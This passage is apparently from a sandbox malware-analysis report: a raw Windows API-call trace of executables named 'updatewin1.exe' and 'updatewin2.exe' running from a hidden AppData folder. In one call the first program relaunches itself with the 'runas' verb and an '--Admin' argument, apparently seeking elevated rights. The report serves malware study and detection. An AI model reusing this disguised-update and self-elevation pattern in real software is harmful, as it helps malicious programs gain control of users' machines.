!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0118.592] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ee0c | out: lpCharType=0x18ee0c) returned 1 [0118.593] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0118.593] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā") returned 256 [0118.593] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0118.593] GetLastError () returned 0x57 [0118.593] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0118.593] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0118.593] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x18e938, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0118.593] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ­\x86lQHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0118.593] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0118.593] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0118.593] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0118.593] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0118.594] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ­\x86lQHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x80) returned 0x26a0d0 [0118.594] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x416cb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe")) returned 0x5f [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xc8) returned 0x26c160 [0118.594] RtlInitializeSListHead (in: ListHead=0x416bd8 | out: ListHead=0x416bd8) [0118.594] GetLastError () returned 0x0 [0118.594] GetEnvironmentStringsW () returned 0x26c230* [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xaca) returned 0x26cd08 [0118.594] FreeEnvironmentStringsW (penv=0x26c230) returned 1 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x98) returned 0x26c230 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3e) returned 0x26d7f8 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x6c) returned 0x26c2d0 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x6e) returned 0x26c348 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x78) returned 0x251180 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x62) returned 0x26c3c0 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2e) returned 0x2552d0 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x48) returned 0x26c430 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x28) returned 0x26a158 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1a) returned 0x26bd10 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x4a) returned 0x26c480 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x72) returned 0x251200 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x30) returned 0x255308 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2e) returned 0x255340 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1c) returned 0x26bd38 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xd2) returned 0x26c4d8 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x7c) returned 0x26c5b8 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x36) returned 0x26c640 [0118.594] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3a) returned 0x26d840 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x90) returned 0x26c680 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x24) returned 0x26c718 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x30) returned 0x255378 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x36) returned 0x26c748 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x48) returned 0x26c788 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x52) returned 0x26c7d8 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3c) returned 0x26d888 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x82) returned 0x26c838 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2e) returned 0x2553b0 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1e) returned 0x26bd60 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2c) returned 0x2553e8 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x54) returned 0x26c8c8 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x52) returned 0x26c928 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2a) returned 0x255420 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3c) returned 0x26d8d0 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x54) returned 0x26c988 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x24) returned 0x26c9e8 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x30) returned 0x255458 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x8c) returned 0x26ca18 [0118.595] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x26cd08 | out: hHeap=0x240000) returned 1 [0118.595] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x800) returned 0x26cab0 [0118.597] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0118.597] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402ae4) returned 0x404e59 [0118.658] GetStartupInfoW (in: lpStartupInfo=0x18f578 | out: lpStartupInfo=0x18f578*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0118.730] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe\" " [0118.730] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe\" ", pNumArgs=0x18e580 | out: pNumArgs=0x18e580) returned 0x26d2b8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe" [0118.731] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc0) returned 0x26d388 [0118.731] lstrcpyW (in: lpString1=0x18e5a0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe" [0118.731] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b") returned 1 [0118.731] lstrcpyW (in: lpString1=0x18eda0, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0118.731] ShellExecuteExW (in: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe", lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe", lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0119.687] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x26d388 | out: hHeap=0x240000) returned 1 [0119.687] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.687] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.687] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x26a0d0 | out: hHeap=0x240000) returned 1 [0119.694] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x26cab0 | out: hHeap=0x240000) returned 1 [0119.722] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0119.722] GetLastError () returned 0x57 [0119.723] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f56c | out: phModule=0x18f56c) returned 0 [0119.723] ExitProcess (uExitCode=0x0) [0119.725] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x26a9e8 | out: hHeap=0x240000) returned 1 [0119.747] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 101 os_tid = 0xb24 Thread: id = 102 os_tid = 0x9f4 Thread: id = 103 os_tid = 0x9f8 Thread: id = 106 os_tid = 0xa38 Process: id = "8" image_name = "updatewin2.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin2.exe" page_root = "0x3cf8f000" os_pid = "0x670" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x34c" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin2.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 99 os_tid = 0x1c4 [0118.271] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xde70b5e0, dwHighDateTime=0x1d6d58a)) [0118.271] GetCurrentProcessId () returned 0x670 [0118.271] GetCurrentThreadId () returned 0x1c4 [0118.271] GetTickCount () returned 0x114f95d [0118.271] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=23845855732) returned 1 [0118.285] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0118.285] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1de0000 [0118.287] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0118.287] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0118.287] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0118.287] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0118.287] GetProcAddress (hModule=0x76d30000, 